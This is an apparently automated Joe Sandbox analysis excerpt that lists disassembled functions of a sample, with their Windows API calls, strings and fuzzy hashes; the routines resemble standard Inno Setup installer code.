String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2481121983-1280779767
Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69

Function 004950AC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B

CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234

Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353

73EA5CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A

Strings

STATIC, xrefs: 0049516A
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 004951E3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 170458502-2312673372
Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8

Function 0042E340 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD

Strings

.DEFAULT\Control Panel\International, xrefs: 0042E394
Control Panel\Desktop\ResourceLocale, xrefs: 0042E3CC
GetUserDefaultUILanguage, xrefs: 0042E35F
kernel32.dll, xrefs: 0042E364
mVE, xrefs: 0042E3FF, 0042E407, 0042E412, 0042E434
Locale, xrefs: 0042E3AC

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
API String ID: 4190037839-37397897
Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59

Function 00462118 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00462124
GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
GetWindowRect.USER32(?,00000000), ref: 0046219E
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC

Strings

MonitorFromWindow, xrefs: 0046213F
GetMonitorInfoA, xrefs: 0046214C
user32.dll, xrefs: 00462133
(, xrefs: 0046217D

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A

Function 0042EFFC Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0042F008
GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
GetWindowRect.USER32(?,00000000), ref: 0042F082
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0

Strings

(, xrefs: 0042F061
user32.dll, xrefs: 0042F017
GetMonitorInfoA, xrefs: 0042F030
MonitorFromWindow, xrefs: 0042F023

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$AddressProc$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 2610873146-3407710046
Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99

Function 00455A80 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 243comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
SysFreeString.OLEAUT32(?), ref: 00455C47

Strings

CoCreateInstance, xrefs: 00455AF3
IPersistFile::Save, xrefs: 00455CC9
IPropertyStore::SetValue, xrefs: 00455BC7, 00455C13
IShellLink::QueryInterface, xrefs: 00455C6B
IPropertyStore::Commit, xrefs: 00455C2C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateInstance$FreeString
String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
API String ID: 308859552-2052886881
Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59

Function 0045833C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02183858,00000000), ref: 00458399
TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02183858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02183858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02183858,?,00000000,004584B0,?,00000000), ref: 00458475
GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02183858,?,00000000,004584B0,?,00000000), ref: 0045847C

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

Strings

TransactNamedPipe, xrefs: 0045840F
CreateEvent, xrefs: 004583A7

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
String ID: CreateEvent$TransactNamedPipe
API String ID: 2182916169-3012584893
Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28

Function 00455F18 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

Strings

GetProcAddress, xrefs: 00455F53
UnRegisterTypeLib, xrefs: 00455F36
UnRegisterTypeLib, xrefs: 00455FFF
LoadTypeLib, xrefs: 00455F9E
OLEAUT32.DLL, xrefs: 00455F3B
ITypeLib::GetLibAttr, xrefs: 00455FC9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressErrorHandleLastLoadModuleProcType
String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
API String ID: 1914119943-2711329623
Opcode ID: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
Instruction ID: 464ca0410b994955771bbd6b79a2bac712fdb799e88c0b9d306e26cdd2de6b74
Opcode Fuzzy Hash: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
Instruction Fuzzy Hash: 2231C471B00604AFCB10EFAACD51E5BB7BEEB89B11B518466FC04D3292DA78DD05C768

Function 00416D90 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(?,?), ref: 00416E23
SaveDC.GDI32(?), ref: 00416E37
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
RestoreDC.GDI32(?,?), ref: 00416E75
CreateSolidBrush.GDI32(00000000), ref: 00416EF5
FrameRect.USER32(?,?,?), ref: 00416F28
DeleteObject.GDI32(?), ref: 00416F32
CreateSolidBrush.GDI32(00000000), ref: 00416F42
FrameRect.USER32(?,?,?), ref: 00416F75
DeleteObject.GDI32(?), ref: 00416F7F

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
Opcode Fuzzy Hash: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99

Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
GetFileType.KERNEL32(?,000000F5), ref: 00404C11
CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
GetLastError.KERNEL32(000000F5), ref: 00404C46

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D

Function 004221F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 00422243
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
Opcode Fuzzy Hash: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C

Function 0045326C Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 225COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353

Strings

NUL, xrefs: 00453415
$pI, xrefs: 00453594, 0045330B, 00453376, 0045330E
[rename], xrefs: 004533B6, 004533F2
MoveFileEx, xrefs: 00453563
.tmp, xrefs: 0045330F
oI, xrefs: 00453390, 004533A0, 004533D3, 0045346B, 00453476, 0045345E
WININIT.INI, xrefs: 00453301

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
API String ID: 390214022-3415521383
Opcode ID: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
Instruction ID: ce58c644a57a5931bfb3eb4b41fd184989c95ed3aef939848703120becc63cdc
Opcode Fuzzy Hash: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
Instruction Fuzzy Hash: 22910734E0010DABDB11EFA5C852BDEB7B5EF49346F508467E800B7392D778AE498B58

Function 0047FE1C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 170windowCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
FreeLibrary.KERNEL32(03100000), ref: 0047FFD8
SendNotifyMessageA.USER32(000103C0,00000496,00002710,00000000), ref: 0048004A

Strings

Deinitializing Setup., xrefs: 0047FE3A
GetCustomSetupExitCode, xrefs: 0047FE79
Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
DeinitializeSetup, xrefs: 0047FED5
Restarting Windows., xrefs: 00480025

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FreeLibrary$MessageNotifySend
String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
API String ID: 3817813901-1884538726
Opcode ID: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
Instruction ID: a364eb3419ca1f30a9e3eb44d73b76d56ae546640220791ead322ba595580ec3
Opcode Fuzzy Hash: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
Instruction Fuzzy Hash: C351A1316002009FD721EB69F945B5A7BE4EB1A314F51847BF805C73A2DB389848CB99

Function 00460DB4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00460DEF
GetActiveWindow.USER32 ref: 00460E53
CoInitialize.OLE32(00000000), ref: 00460E67
SHBrowseForFolder.SHELL32(?), ref: 00460E7E
CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2

Strings

A, xrefs: 00460E27

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
String ID: A
API String ID: 2684663990-3554254475
Opcode ID: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
Instruction ID: e80b4c5213709972e599e89028d95aa00c835143d3680f9f001b64d6594dadc3
Opcode Fuzzy Hash: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
Instruction Fuzzy Hash: 8C3130B0D00218AFDB01EFB6D885A9EBBF8EB09304F51447AF914F7251E7789A04CB59

Function 00471998 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON

Download Yara Rule

APIs

